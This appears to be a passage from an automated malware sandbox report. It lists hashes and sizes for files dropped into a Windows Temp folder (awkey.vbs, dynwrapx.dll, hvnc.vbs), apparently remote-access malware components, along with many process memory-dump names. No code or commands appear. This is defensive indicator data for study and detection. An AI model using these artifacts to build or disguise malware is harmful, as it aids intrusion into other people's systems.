SHA256
07b1c9825e6798694b9e3572bb90a58b39559234cd03f9e9dc0b3ace616a15db

SHA512
e13f69346cc592eca8527d288d7d979ceca00fabebb8980f3b451dfd491241cb21c9edff7670e4953347798477efaa056d68ee45cdada66409c9b8e491dacf4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\awkey.vbs

Filesize
1.1MB

MD5
3c44cca186e2358ffaa11e6add5e1a94

SHA1
b008514d3dbcefe01dafc072c055bb3416034551

SHA256
6c88548cd89a132ab38447bce1b88ac13ebfb17eeb56de93d4e1977846c9be77

SHA512
fd97ce74a1c5c3f170bfb5fb18fbfc945e6e6487f76011402b33ff306da18f4dacda3715253eba4362e19a3069862a3e9beb0883945163cad618ff5a33c6e6ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

Filesize
13KB

MD5
e0b8dfd17b8e7de760b273d18e58b142

SHA1
801509fb6783c9e57edc67a72dde3c62080ffbaf

SHA256
4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

SHA512
443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

Download Submit
C:\Users\Admin\AppData\Local\Temp\hvnc.vbs

Filesize
298KB

MD5
13bcebd79747824b1966afc080b7298f

SHA1
7d66096c52b4babc2bfb4cb75f4daef8ce02d1f5

SHA256
10486b71fd00cdd140389249f15f11bf5480cb805e07d18e90086150ec1f3d39

SHA512
b4cb467388f23ddc7b2731639c0706a3ab181149ac0efceac7ff31badb8c9c331781fe65d38d7e6381a014c2634e9091fd7501c82eb94c74aa6fabb28db60920

Download Submit
memory/760-31-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/760-55-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/760-50-0x0000000006CE0000-0x0000000006CFA000-memory.dmp

Filesize
104KB

Download
memory/760-49-0x00000000079C0000-0x0000000007A56000-memory.dmp

Filesize
600KB

Download
memory/760-48-0x0000000006830000-0x000000000687C000-memory.dmp

Filesize
304KB

Download
memory/760-30-0x0000000005250000-0x0000000005286000-memory.dmp

Filesize
216KB

Download
memory/760-51-0x0000000006D30000-0x0000000006D52000-memory.dmp

Filesize
136KB

Download
memory/760-33-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/760-35-0x0000000006060000-0x0000000006082000-memory.dmp

Filesize
136KB

Download
memory/760-34-0x00000000058C0000-0x0000000005EE8000-memory.dmp

Filesize
6.2MB

Download
memory/760-32-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/760-36-0x0000000006100000-0x0000000006166000-memory.dmp

Filesize
408KB

Download
memory/760-47-0x00000000067F0000-0x000000000680E000-memory.dmp

Filesize
120KB

Download
memory/760-46-0x0000000006410000-0x0000000006764000-memory.dmp

Filesize
3.3MB

Download
memory/1008-168-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/1008-188-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/1008-164-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1008-167-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1008-185-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1032-174-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1040-146-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1040-159-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1696-170-0x0000000003F70000-0x0000000003F71000-memory.dmp

Filesize
4KB

Download
memory/1696-165-0x0000000003B90000-0x0000000003B91000-memory.dmp

Filesize
4KB

Download
memory/1696-175-0x0000000004010000-0x0000000004011000-memory.dmp

Filesize
4KB

Download
memory/1696-180-0x00000000040A0000-0x00000000040A1000-memory.dmp

Filesize
4KB

Download
memory/1768-76-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1768-78-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1768-73-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1832-15-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

Filesize
64KB

Download
memory/1832-13-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1832-25-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1916-91-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1916-92-0x0000000002E80000-0x0000000002E90000-memory.dmp

Filesize
64KB

Download
memory/1916-108-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/1916-105-0x0000000006970000-0x00000000069BC000-memory.dmp

Filesize
304KB

Download
memory/1916-103-0x0000000006380000-0x00000000066D4000-memory.dmp

Filesize
3.3MB

Download
memory/1916-93-0x0000000002E80000-0x0000000002E90000-memory.dmp

Filesize
64KB

Download
memory/2304-22-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/2304-26-0x0000000006EF0000-0x0000000006F66000-memory.dmp

Filesize
472KB

Download
memory/2304-74-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/2304-21-0x0000000006340000-0x00000000068E4000-memory.dmp

Filesize
5.6MB

Download
memory/2304-83-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/2304-6-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2304-12-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/2304-27-0x00000000060B0000-0x00000000060BC000-memory.dmp

Filesize
48KB

Download
memory/2304-9-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/2304-18-0x0000000005CF0000-0x0000000005D8C000-memory.dmp

Filesize
624KB

Download
memory/2304-28-0x0000000006E90000-0x0000000006EAE000-memory.dmp

Filesize
120KB

Download
memory/2304-23-0x0000000074CB0000-0x0000000074CC2000-memory.dmp

Filesize
72KB

Download
memory/2484-172-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/2500-204-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/2500-189-0x0000000072A80000-0x0000000073230000-memory.dmp

Filesize
7.7MB

Download
memory/2500-190-0x0000000004990000-0x00000000049A0000-memory.dmp

Filesize
64KB

Download
memory/2500-191-0x0000000004990000-0x00000000049A0000-memory.dmp

Filesize
64KB

Download
memory/2504-209-0x0000000004D80000-0x0000000004D81000-memory.dmp

Filesize
4KB

Download
memory/2892-135-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/2892-113-0x0000000004D80000-0x0000000004D81000-memory.dmp

Filesize
4KB

Download
memory/2892-130-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/2892-137-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/3204-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3204-86-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3204-85-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3516-126-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-115-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-181-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-182-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-114-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-116-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-118-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-145-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-125-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-124-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-123-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-121-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3516-120-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3600-225-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3600-226-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4032-133-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4032-131-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4032-132-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4060-11-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/4060-7-0x00000000040C0000-0x00000000040C1000-memory.dmp

Filesize
4KB

Download
memory/4060-20-0x0000000004A80000-0x0000000004A81000-memory.dmp

Filesize
4KB

Download
memory/4120-71-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-177-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-176-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-70-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-69-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-68-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-67-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-65-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-63-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-60-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4120-61-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4256-232-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4256-231-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4264-62-0x00000000055C0000-0x00000000055C1000-memory.dmp

Filesize
4KB

Download
memory/4264-84-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/4264-75-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/4600-141-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4600-140-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4600-139-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-210-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-211-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-212-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-215-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-218-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-219-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4812-220-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download